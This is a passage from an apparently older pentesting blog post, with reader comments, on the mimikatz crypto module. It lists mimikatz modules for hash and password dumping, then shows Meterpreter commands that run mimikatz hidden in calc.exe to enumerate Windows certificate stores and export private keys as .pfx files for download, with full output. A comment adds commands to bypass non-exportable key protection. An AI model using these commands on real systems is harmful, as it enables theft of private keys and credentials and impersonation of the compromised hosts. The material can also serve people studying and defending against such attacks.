But, now that its working in memory, you can do lots more with it. Below are the various modules
"standard"
; commandes de basecrypto
; Cryptographie et certificatssekurlsa
; Dump de hashes et de mots de passes Windowssystem
; Gestion systèmeprocess
; Manipulation des processusthread
; Manipulation des threadsservice
; Manipulation des servicesprivilege
; Manipulation des privilègeswinmine
; Manipulation du démineur de Windows XP (démonstration)minesweeper
; Manipulation du démineur de Windows Vista et 7 (démonstration)nogpo
; Pour éviter quelques GPO trivialessamdump
; Dump de SAM offlineinject
; Injecteur de librairiests
; Manipulations Terminal Serverdivers
; Fonctions diverses trop petites pour s’émanciper
The Crypto module does some interesting things. I briefly talked about stealing certificates at DerbyCon. the crypto module helps you do this.
crypto::listkeys, crypto::listProviders, crypto::listStores, crypto::listCertificates
to identify fun stuff that you want for your own from the host.
then crypto::exportKeys and crypto::exportCertifcates
to take that stuff home.
kinda looks like this:
meterpreter > execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listStores" exit'
Process 9904 created.
Channel 20 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listStores
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
My
Root
Trust
CA
TrustedPublisher
Disallowed
AuthRoot
TrustedPeople
ADDRESSBOOK
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My" exit'
Process 3472 created.
Channel 12 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::listCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE My
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- sqlapps01
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
mimikatz(commandline) # exit
execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit'
Process 6112 created.
Channel 23 created.
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 6 2012 04:02:46) */
// http://blog.gentilkiwi.com/mimikatz
mimikatz(commandline) # crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE
Emplacement : 'CERT_SYSTEM_STORE_LOCAL_MACHINE'\My
- MACHINENAME
Container Clé : SELFSSL
Provider : Microsoft RSA SChannel Cryptographic Provider
Type : AT_KEYEXCHANGE
Exportabilité : OUI
Taille clé : 1024
Export privé dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.pfx' : OK
Export public dans 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_MACHINENAME.der' : OK
mimikatz(commandline) # exit
once exported you download the .pfx and .der files
Maybe the next mimikatz feature can be Internet-happy English translations
ReplyDeleteNo
ReplyDelete:)
btw, don't forget :
ReplyDelete- crypto::patchcapi
or/and
- privilege::debug
- crypto::patchcng
it export "no exportable" ;)